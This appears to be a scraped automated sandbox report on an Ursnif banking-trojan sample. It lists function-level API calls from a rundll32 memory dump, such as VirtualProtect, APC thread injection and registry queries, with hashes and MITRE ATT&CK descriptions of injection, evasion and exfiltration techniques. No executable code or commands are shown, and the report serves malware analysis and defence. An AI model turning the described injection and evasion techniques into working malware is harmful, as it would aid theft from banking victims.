Instruction Fuzzy Hash: 5DB1F93120CB864FDBA8DF28D9857A9B3E1FB95300F58457DD48FC7692DA34A4068793

Uniqueness

Uniqueness Score: -1.00%

Function 0000027FF74D1AC4, Relevance: 1.6, APIs: 1, Instructions: 51
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtQueryInformationProcess.NTDLL ref: 0000027FF74D1AEA

Memory Dump Source

Source File: 00000027.00000002.847104724.0000027FF74C1000.00000020.00000001.sdmp, Offset: 0000027FF74C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_27ff74c1000_rundll32.jbxd

Similarity

API ID: InformationProcessQuery
String ID:
API String ID: 1778838933-0
Opcode ID: 1b5ff2e331e8eff1cde1f90d4881bb7eda4a5dda6d44182f68fae4d6ac00e22a
Instruction ID: 34a62c856204d8590af19b7a34eedbe2a018d6f667dfcae4e17d7932e3453646
Opcode Fuzzy Hash: 1b5ff2e331e8eff1cde1f90d4881bb7eda4a5dda6d44182f68fae4d6ac00e22a
Instruction Fuzzy Hash: 4801213031C94A8FE7D4EF69D5C8A35B7E1FBA8305B95056DD849C3194FA34D485CB12

Uniqueness

Uniqueness Score: -1.00%

Function 0000027FF74E0F8C, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 99
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0000027FF74EA864: RegCreateKeyA.ADVAPI32 ref: 0000027FF74EA887

RegQueryValueExA.KERNELBASE ref: 0000027FF74E0FF5

Strings

(, xrefs: 0000027FF74E103D
(, xrefs: 0000027FF74E1001

Memory Dump Source

Source File: 00000027.00000002.847104724.0000027FF74C1000.00000020.00000001.sdmp, Offset: 0000027FF74C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_27ff74c1000_rundll32.jbxd

Similarity

API ID: CreateQueryValue
String ID: ($(
API String ID: 2711935003-222463766
Opcode ID: e12b90d25e48638c248cf623991a1d23c50be5cb427306bedcf9ef54acb60cae
Instruction ID: 7273adcb05b5fd4dfa14c186637161f7cd4ccd0f81e630b3f4d55b8e0c7fb295
Opcode Fuzzy Hash: e12b90d25e48638c248cf623991a1d23c50be5cb427306bedcf9ef54acb60cae
Instruction Fuzzy Hash: 29317E3460C789CFF384EF54E8587A5B3E1F798314F50862EE48AC26A1DF789544CB02

Uniqueness

Uniqueness Score: -1.00%

Function 0000027FF74F1310, Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 311
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE ref: 0000027FF74F144D

Strings

H, xrefs: 0000027FF74F1334

Memory Dump Source

Source File: 00000027.00000002.847104724.0000027FF74C1000.00000020.00000001.sdmp, Offset: 0000027FF74C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_27ff74c1000_rundll32.jbxd

Similarity

API ID: LibraryLoad
String ID: H
API String ID: 1029625771-2852464175
Opcode ID: ea8b0be554912eee910b5f6e76d5c63edd561062f2e3a805656d28eae44b2b83
Instruction ID: b08ff3de4d3d37c73f727327433d68825aaef3e6777acb66b6f5475d92584660
Opcode Fuzzy Hash: ea8b0be554912eee910b5f6e76d5c63edd561062f2e3a805656d28eae44b2b83
Instruction Fuzzy Hash: 2AA1513050CB4A8FE795EF5CD8887A6B3E1FB98305F40462ED84AC76A1EF34D9458B52

Uniqueness

Uniqueness Score: -1.00%

Function 0000027FF74EFEB8, Relevance: 3.2, APIs: 2, Instructions: 202
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0000027FF74E1458: VirtualProtect.KERNELBASE ref: 0000027FF74E148B

VirtualProtect.KERNELBASE ref: 0000027FF74EFFD6
VirtualProtect.KERNELBASE ref: 0000027FF74EFFF9

Memory Dump Source

Source File: 00000027.00000002.847104724.0000027FF74C1000.00000020.00000001.sdmp, Offset: 0000027FF74C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_27ff74c1000_rundll32.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 8ab32006bd1df6a701864ba7e3d69da663e7aed914991a2a5fb048f6e1491c04
Instruction ID: 975f2a3a26052c40a54f0f48bc98c396babc0c63e016e4ed42ef7182ba69cfde
Opcode Fuzzy Hash: 8ab32006bd1df6a701864ba7e3d69da663e7aed914991a2a5fb048f6e1491c04
Instruction Fuzzy Hash: D5615C7061CA0ACFE784EF29D589B65B7E0FB98310F50056AE44EC36A1DF34E941CB92

Uniqueness

Uniqueness Score: -1.00%

Function 0000027FF74E6E1C, Relevance: 3.1, APIs: 2, Instructions: 147
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

StrRChrA.KERNELBASE ref: 0000027FF74E6E7A
RtlAddVectoredContinueHandler.NTDLL ref: 0000027FF74E6F6E

Memory Dump Source

Source File: 00000027.00000002.847104724.0000027FF74C1000.00000020.00000001.sdmp, Offset: 0000027FF74C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_27ff74c1000_rundll32.jbxd

Similarity

API ID: ContinueHandlerVectored
String ID:
API String ID: 3758255415-0
Opcode ID: 18d8ac82230bdfc4302373f1128c0f5960e1e63dc188b60f3db038388c3e2014
Instruction ID: 4ca5d6fdaeef408cdc8bdefd2db174dc2068897d4e0f5d1c3871f29c9e667e8b
Opcode Fuzzy Hash: 18d8ac82230bdfc4302373f1128c0f5960e1e63dc188b60f3db038388c3e2014
Instruction Fuzzy Hash: BD51B43060C606CBF7D0EF6899487AAB6E2EB98315F84813ED44AC36E1DF38C5058B53

Uniqueness

Uniqueness Score: -1.00%

Function 0000027FF74D076C, Relevance: 3.1, APIs: 2, Instructions: 97
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0000027FF74EA864: RegCreateKeyA.ADVAPI32 ref: 0000027FF74EA887

RegQueryValueExA.KERNELBASE ref: 0000027FF74D07C3
RegCloseKey.KERNELBASE ref: 0000027FF74D0833

Memory Dump Source

Source File: 00000027.00000002.847104724.0000027FF74C1000.00000020.00000001.sdmp, Offset: 0000027FF74C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_27ff74c1000_rundll32.jbxd

Similarity

API ID: CloseCreateQueryValue
String ID:
API String ID: 4083198587-0
Opcode ID: 63f8bf2ffbde9439b19e476579ef08d7f0cd75ef32b6588a115372ae452a6d9a
Instruction ID: 9a9db123bd0f805dda7f9c549edd3e7b59d16134701d29a2cced43e0f6db1a8d
Opcode Fuzzy Hash: 63f8bf2ffbde9439b19e476579ef08d7f0cd75ef32b6588a115372ae452a6d9a
Instruction Fuzzy Hash: 92212B3061CB088FE794EB28A849766B7D1FB98351F50452AE48DC32A1EB24D841CB93

Uniqueness

Uniqueness Score: -1.00%

Function 0000027FF74EA864, Relevance: 3.1, APIs: 2, Instructions: 60
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegCreateKeyA.ADVAPI32 ref: 0000027FF74EA887
RegOpenKeyA.ADVAPI32 ref: 0000027FF74EA894

Memory Dump Source

Source File: 00000027.00000002.847104724.0000027FF74C1000.00000020.00000001.sdmp, Offset: 0000027FF74C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_27ff74c1000_rundll32.jbxd

Similarity

API ID: CreateOpen
String ID:
API String ID: 436179556-0
Opcode ID: 0fd58de01818f39c689c8671fe547acd9089d8ae02dcc106006c6a54173f430a
Instruction ID: c56634f519ae64c664fe894f0a84d7e7ccb8ac111e0524f7750639427547ad76
Opcode Fuzzy Hash: 0fd58de01818f39c689c8671fe547acd9089d8ae02dcc106006c6a54173f430a
Instruction Fuzzy Hash: E9118E3060CA458FEB94EB5C9488B69F7E1FBA8310F50442EE88DC33A1DEA4C9418793

Uniqueness

Uniqueness Score: -1.00%

Function 0000027FF74E10CC, Relevance: 3.1, APIs: 2, Instructions: 59
threadinjectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateThread.KERNELBASE ref: 0000027FF74E10FC
QueueUserAPC.KERNELBASE ref: 0000027FF74E1113

Memory Dump Source

Source File: 00000027.00000002.847104724.0000027FF74C1000.00000020.00000001.sdmp, Offset: 0000027FF74C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_27ff74c1000_rundll32.jbxd

Similarity

API ID: CreateQueueThreadUser
String ID:
API String ID: 3600083758-0
Opcode ID: c5f73e2456696368beb962f5df60b520ee6541a707c920c0f1f52e72b2ec33b6
Instruction ID: 2f8011e97cf6047e477ae929d96d56b002839b56e2c3cbfb3758da9cabe9fe79
Opcode Fuzzy Hash: c5f73e2456696368beb962f5df60b520ee6541a707c920c0f1f52e72b2ec33b6
Instruction Fuzzy Hash: 9B015631718A094FEB84EF2CA84D769B7E2E7AC711B048179E509C32A0DF34DC418B82

Uniqueness

Uniqueness Score: -1.00%

Function 0000027FF74D7DD8, Relevance: 1.7, APIs: 1, Instructions: 216
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE ref: 0000027FF74D7F24

Memory Dump Source

Source File: 00000027.00000002.847104724.0000027FF74C1000.00000020.00000001.sdmp, Offset: 0000027FF74C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_27ff74c1000_rundll32.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 6aa1d7655563690a4da4f05cca64eafe950653d6a721fc7ea7dd1fa497ac3de5
Instruction ID: f4a32a5a9290eb7b417e7fa24f17c232cbd2a89b5fc1ae36a4a752734833ac0a
Opcode Fuzzy Hash: 6aa1d7655563690a4da4f05cca64eafe950653d6a721fc7ea7dd1fa497ac3de5
Instruction Fuzzy Hash: D961323061CA05DFE794EF18D989665B7E1FB6C301F90452EE48EC3691EF34E8418B96

Uniqueness

Uniqueness Score: -1.00%

Function 0000027FF74E1458, Relevance: 1.6, APIs: 1, Instructions: 74
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE ref: 0000027FF74E148B

Memory Dump Source

Source File: 00000027.00000002.847104724.0000027FF74C1000.00000020.00000001.sdmp, Offset: 0000027FF74C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_27ff74c1000_rundll32.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 4a765497a387f33308d21eb6f57c50523c4476f30fd5c9db11123bb1565e96cc
Instruction ID: c25ff200c28c8535c2594d55b952fb1189f5b481d929cf85e00f60e253d50f8f
Opcode Fuzzy Hash: 4a765497a387f33308d21eb6f57c50523c4476f30fd5c9db11123bb1565e96cc
Instruction Fuzzy Hash: D0117F3124CA089FAB58EF59B8851A5B3E5EB9C316B40453DE94EC3295EA30ED05CB82

Uniqueness

Uniqueness Score: -1.00%

Function 0000027FF74D638C, Relevance: 1.6, APIs: 1, Instructions: 73
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0000027FF74EA864: RegCreateKeyA.ADVAPI32 ref: 0000027FF74EA887

RegQueryValueExA.KERNELBASE ref: 0000027FF74D63E2

Memory Dump Source

Source File: 00000027.00000002.847104724.0000027FF74C1000.00000020.00000001.sdmp, Offset: 0000027FF74C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_27ff74c1000_rundll32.jbxd

Similarity

API ID: CreateQueryValue
String ID:
API String ID: 2711935003-0
Opcode ID: a38569a501b8e0ec64ed77100791f3d441e58a8fbacd49a898224bfc5fb91074
Instruction ID: e689902062e064e860d9611bc799578e72052fa22a673051b83e54419ebffa57
Opcode Fuzzy Hash: a38569a501b8e0ec64ed77100791f3d441e58a8fbacd49a898224bfc5fb91074
Instruction Fuzzy Hash: B3214F3051C7488FE795EB64D848BAAB7E1FB98305F90092AE48AC3691EF74D5458B43

Uniqueness

Uniqueness Score: -1.00%

Function 0000027FF74CA92C, Relevance: 1.5, APIs: 1, Instructions: 42
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindCloseChangeNotification.KERNELBASE ref: 0000027FF74CA97D

Memory Dump Source

Source File: 00000027.00000002.847104724.0000027FF74C1000.00000020.00000001.sdmp, Offset: 0000027FF74C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_27ff74c1000_rundll32.jbxd

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: bfcf9b11c8a571321a20197ae80eed82d55b94b58a0f7e34586d0728a82784e3
Instruction ID: 6a580c33d5f8dc9c922dcfb7dc5b61cdf46834bca70ac7136a8820988705949d
Opcode Fuzzy Hash: bfcf9b11c8a571321a20197ae80eed82d55b94b58a0f7e34586d0728a82784e3
Instruction Fuzzy Hash: 0EF0813431CB064BEB98DE58E489B2AB6D1EB98201F44592EB50AC3290CF74C8014B12

Uniqueness

Uniqueness Score: -1.00%

Function 0000027FF74E2E50, Relevance: 1.5, APIs: 1, Instructions: 237stringCOMMON

Download Yara Rule

APIs

lstrcmp.KERNEL32 ref: 0000027FF74E2F7D

Memory Dump Source

Source File: 00000027.00000002.847104724.0000027FF74C1000.00000020.00000001.sdmp, Offset: 0000027FF74C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_27ff74c1000_rundll32.jbxd

Similarity

API ID: lstrcmp
String ID:
API String ID: 1534048567-0
Opcode ID: 1608627adbaccf2637d2de6840cab0dcfe8de2003ac308ffa53b0243ab2e23b6
Instruction ID: aa251996900ec53362df32e240522028c8b89c3e589872ca7376cfe8fb3fa11c
Opcode Fuzzy Hash: 1608627adbaccf2637d2de6840cab0dcfe8de2003ac308ffa53b0243ab2e23b6
Instruction Fuzzy Hash: A471953061CB45CFD799EF08C485A66B7E1FB98710F50462DE48E83695DB30E846C793

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	DLL monitoring, File monitoring, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting/hooking and modifying operating system API calls that supply system information.
Tactics:	Defense Evasion
Data Sources:	BIOS, MBR, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.Unlike Keylogging , this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Loaded DLLs, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of accounts on a system or within an environment. This information can help adversaries determine which accounts exist to aid in follow-on behavior.
Tactics:	Discovery
Data Sources:	API monitoring, Azure activity logs, Office 365 account logs, Process command-line parameters, Process monitoring
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report 2Q4tLHa5wbO1.vbs

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Threatname: Ursnif

Yara Overview

Memory Dumps

Sigma Overview

System Summary:

Signature Overview

AV Detection:

Spreading:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Lowering of HIPS / PFW / Operating System Security Settings:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

Private

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTP Packets

Code Manipulations

User Modules

Hook Summary

Processes

Statistics

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Authentication logs, Email gateway, File monitoring, Mail server, Office 365 trace logs, Process monitoring, Process use of network
Platforms:	Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a connection proxy to direct network traffic between systems or act as an intermediary for network communications to a command and control server to avoid direct connections to their infrastructure. Many tools exist that enable traffic redirection through proxies or port redirection, including HTRAN , ZXProxy, and ZXPortMap. Adversaries use these types of proxies to manage command and control communications, reduce the number of simultaneous outbound network connections, provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between victims to avoid suspicion. Adversaries may chain together multiple proxies to further disguise the source of malicious traffic.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre